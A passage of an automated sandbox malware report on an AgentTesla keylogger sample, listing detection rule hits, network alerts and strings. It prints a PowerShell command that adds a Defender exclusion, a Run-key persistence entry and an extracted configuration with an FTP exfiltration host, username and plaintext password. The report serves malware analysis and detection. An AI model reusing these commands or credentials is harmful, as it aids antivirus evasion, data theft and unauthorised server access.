77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72df4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xafe14:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72e66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xafe86:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72efc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaff1c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fe0c:$s2: GetPrivateProfileString 0xace2c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f492:$s3: get_OSFullName 0xac4b2:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70b89:$s5: remove_Key 0x70d49:$s5: remove_Key 0xadba9:$s5: remove_Key 0xadd69:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71cc1:$s6: FtpWebRequest 0xaece1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x72bde:$s7: logins
Click to see the 38 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iNFGd6bDZX.exe", ParentImage: C:\Users\user\Desktop\iNFGd6bDZX.exe, ParentProcessId: 7352, ParentProcessName: iNFGd6bDZX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\iNFGd6bDZX.exe, ProcessId: 7568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iNFGd6bDZX.exe", ParentImage: C:\Users\user\Desktop\iNFGd6bDZX.exe, ParentProcessId: 7352, ParentProcessName: iNFGd6bDZX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", ProcessId: 7540, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:21:16.078441+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49741	192.254.225.136	21	TCP
2025-01-11T04:21:23.851673+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49752	192.254.225.136	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:21:16.551813+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49744	192.254.225.136	42249	TCP
2025-01-11T04:21:16.559832+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49744	192.254.225.136	42249	TCP
2025-01-11T04:21:24.331495+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49753	192.254.225.136	47402	TCP
2025-01-11T04:21:24.336767+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49753	192.254.225.136	47402	TCP

Joe Security MALWARE AgentTesla - FTP Exfil Passwords

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:21:24.336767+0100	1800009	1	A Network Trojan was detected	192.168.2.4	49753	192.254.225.136	47402	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: iNFGd6bDZX.exe	Virustotal: Detection: 72%			Perma Link
Source: iNFGd6bDZX.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: iNFGd6bDZX.exe

Joe Sandbox ML: detected

Source: iNFGd6bDZX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: iNFGd6bDZX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Code function: 4x nop then jmp 08EED532h

0_2_08EED88D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 192.254.225.136:42249
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49752 -> 192.254.225.136:21
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 192.254.225.136:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 192.254.225.136:47402
Source: Network traffic	Suricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.4:49753 -> 192.254.225.136:47402

Source: Joe Sandbox View	IP Address: 192.254.225.136 192.254.225.136
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 192.254.225.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.ercolina-usa.com

Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ercolina-usa.com
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.ercolina-usa.com
Source: newapp.exe, 0000000C.00000002.1923055304.0000000002689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1837746080.0000000003695000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1923055304.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49751 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\iNFGd6bDZX.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C70F18	0_2_00C70F18
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C72C50	0_2_00C72C50
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C72C60	0_2_00C72C60
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C70E85	0_2_00C70E85
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C737D0	0_2_00C737D0
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_00C737E0	0_2_00C737E0
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EE1E78	0_2_08EE1E78
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EEF138	0_2_08EEF138
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EED3E0	0_2_08EED3E0
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EEAA78	0_2_08EEAA78
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EE8B60	0_2_08EE8B60
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EE8F98	0_2_08EE8F98
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EEA640	0_2_08EEA640
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 0_2_08EE8728	0_2_08EE8728
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_0196EB20	5_2_0196EB20
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_01964A68	5_2_01964A68
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_01963E50	5_2_01963E50
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_01964198	5_2_01964198
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_0196ADB0	5_2_0196ADB0
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EA697C	5_2_06EA697C
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EA6E10	5_2_06EA6E10
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EA1F31	5_2_06EA1F31
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EA5D48	5_2_06EA5D48
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB66D8	5_2_06EB66D8
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB56A8	5_2_06EB56A8
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB3568	5_2_06EB3568
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EBB2FF	5_2_06EBB2FF
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EBC260	5_2_06EBC260
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB7E60	5_2_06EB7E60
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB7780	5_2_06EB7780
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB2728	5_2_06EB2728
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EBE490	5_2_06EBE490
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB0040	5_2_06EB0040
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB5DCF	5_2_06EB5DCF
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Code function: 5_2_06EB0021	5_2_06EB0021
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01642308	7_2_01642308
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01640F18	7_2_01640F18
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01642231	7_2_01642231
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01642C60	7_2_01642C60
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01642C50	7_2_01642C50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01640E85	7_2_01640E85
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_01643241	7_2_01643241
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_016437D0	7_2_016437D0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_016436A8	7_2_016436A8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_016436B8	7_2_016436B8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028CE020	10_2_028CE020
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028CEA00	10_2_028CEA00
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028C4A68	10_2_028C4A68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_028CA828	10_2_028CA828
